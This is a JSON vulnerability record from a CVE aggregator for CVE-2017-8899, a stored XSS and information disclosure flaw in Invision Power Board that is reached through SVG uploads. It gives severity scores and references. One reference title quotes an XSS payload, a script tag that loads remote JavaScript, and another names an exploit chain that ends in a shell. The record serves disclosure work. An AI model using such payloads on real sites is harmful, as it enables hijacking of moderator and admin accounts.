{"api_version":"1","generated_at":"2026-04-29T12:11:52+00:00","cve":"CVE-2017-8899","urls":{"html":"https://cve.report/CVE-2017-8899","api":"https://cve.report/api/cve/CVE-2017-8899.json","docs":"https://cve.report/api","cve_org":"https://www.cve.org/CVERecord?id=CVE-2017-8899","nvd":"https://nvd.nist.gov/vuln/detail/CVE-2017-8899"},"summary":{"title":"CVE-2017-8899","description":"Invision Power Services (IPS) Community Suite 4.1.19.2 and earlier has a composite of Stored XSS and Information Disclosure issues in the attachments feature found in User CP. This can be triggered by any Invision Power Board user and can be used to gain access to moderator/admin accounts. The primary cause is the ability to upload an SVG document with a crafted attribute such an onload; however, full path disclosure is required for exploitation.","state":"PUBLIC","assigner":"cve@mitre.org","published_at":"2017-05-11 17:29:00","updated_at":"2020-06-03 14:55:00"},"problem_types":["CWE-79","CWE-200"],"metrics":[],"references":[{"url":"https://twitter.com/sxcurity/status/862284967715381248","name":"https://twitter.com/sxcurity/status/862284967715381248","refsource":"MISC","tags":["Exploit","Third Party Advisory"],"title":"Corben Leo na Twitterze: \"Payload could be something like this: <script src=//sxcurity.pro/pocs/p.js></script>… \"","mime":"text/html","httpstatus":"200","archivestatus":"200"},{"url":"http://zeroday.insecurity.zone/exploits/ipb_owned.txt","name":"http://zeroday.insecurity.zone/exploits/ipb_owned.txt","refsource":"MISC","tags":["Exploit","Third Party Advisory"],"title":"","mime":"text/plain","httpstatus":"-1","archivestatus":"200"},{"url":"https://twitter.com/insecurity/status/862154908895780864","name":"https://twitter.com/insecurity/status/862154908895780864","refsource":"MISC","tags":["Exploit","Third Party Advisory"],"title":"PROJECT INSECURITY na Twitterze: \"[EXPLOIT] IPB Forum (4x: Current) - Reflected/Stored XSS + CSRF + FPD + Malicious file upload + ACP->Shell\n\nwriteup: https://t.co/5XEw98fIVk… https://t.co/RqpG6zDfzW\"","mime":"text/html","httpstatus":"200","archivestatus":"200"},{"url":"https://www.cve.org/CVERecord?id=CVE-2017-8899","name":"CVE Program record","refsource":"CVE.ORG","tags":["canonical"]},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-8899","name":"NVD vulnerability detail","refsource":"NVD","tags":["canonical","analysis"]}],"affected":[],"timeline":[],"solutions":[],"workarounds":[],"exploits":[],"credits":[],"nvd_cpes":[{"cve_year":"2017","cve_id":"8899","vulnerable":"1","versionEndIncluding":"4.1.19.2","cpe1":"cpe","cpe2":"2.3","cpe3":"a","cpe4":"invisioncommunity","cpe5":"invision_power_board","cpe6":"*","cpe7":"*","cpe8":"*","cpe9":"*","cpe10":"*","cpe11":"*","cpe12":"*","cpe13":"*"}],"vendor_comments":[],"enrichments":{"kev":null,"epss":null,"legacy_qids":[]},"source_records":{"cve_program":{"CVE_data_meta":{"ASSIGNER":"cve@mitre.org","ID":"CVE-2017-8899","STATE":"PUBLIC"},"affects":{"vendor":{"vendor_data":[{"product":{"product_data":[{"product_name":"n/a","version":{"version_data":[{"version_value":"n/a"}]}}]},"vendor_name":"n/a"}]}},"data_format":"MITRE","data_type":"CVE","data_version":"4.0","description":{"description_data":[{"lang":"eng","value":"Invision Power Services (IPS) Community Suite 4.1.19.2 and earlier has a composite of Stored XSS and Information Disclosure issues in the attachments feature found in User CP. This can be triggered by any Invision Power Board user and can be used to gain access to moderator/admin accounts. The primary cause is the ability to upload an SVG document with a crafted attribute such an onload; however, full path disclosure is required for exploitation."}]},"problemtype":{"problemtype_data":[{"description":[{"lang":"eng","value":"n/a"}]}]},"references":{"reference_data":[{"name":"http://zeroday.insecurity.zone/exploits/ipb_owned.txt","refsource":"MISC","url":"http://zeroday.insecurity.zone/exploits/ipb_owned.txt"},{"name":"https://twitter.com/insecurity/status/862154908895780864","refsource":"MISC","url":"https://twitter.com/insecurity/status/862154908895780864"},{"name":"https://twitter.com/sxcurity/status/862284967715381248","refsource":"MISC","url":"https://twitter.com/sxcurity/status/862284967715381248"}]}},"nvd":{"publishedDate":"2017-05-11 17:29:00","lastModifiedDate":"2020-06-03 14:55:00","problem_types":["CWE-79","CWE-200"],"metrics":{"baseMetricV3":{"cvssV3":{"version":"3.0","vectorString":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9},"baseMetricV2":{"cvssV2":{"version":"2.0","vectorString":"AV:N/AC:M/Au:N/C:P/I:P/A:P","accessVector":"NETWORK","accessComplexity":"MEDIUM","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL","baseScore":6.8},"severity":"MEDIUM","exploitabilityScore":8.6,"impactScore":6.4,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}},"configurations":{"CVE_data_version":"4.0","nodes":[{"operator":"OR","children":[],"cpe_match":[{"vulnerable":true,"cpe23Uri":"cpe:2.3:a:invisioncommunity:invision_power_board:*:*:*:*:*:*:*:*","versionEndIncluding":"4.1.19.2","cpe_name":[]}]}]}},"legacy_mitre":{"record":{"CveYear":"2017","CveId":"8899","Ordinal":"105838","Title":"CVE-2017-8899","CVE":"CVE-2017-8899","Year":"2017"},"notes":[{"CveYear":"2017","CveId":"8899","Ordinal":"1","NoteData":"Invision Power Services (IPS) Community Suite 4.1.19.2 and earlier has a composite of Stored XSS and Information Disclosure issues in the attachments feature found in User CP. This can be triggered by any Invision Power Board user and can be used to gain access to moderator/admin accounts. The primary cause is the ability to upload an SVG document with a crafted attribute such an onload; however, full path disclosure is required for exploitation.","Type":"Description","Title":null},{"CveYear":"2017","CveId":"8899","Ordinal":"2","NoteData":"2017-05-11","Type":"Other","Title":"Published"}]}}}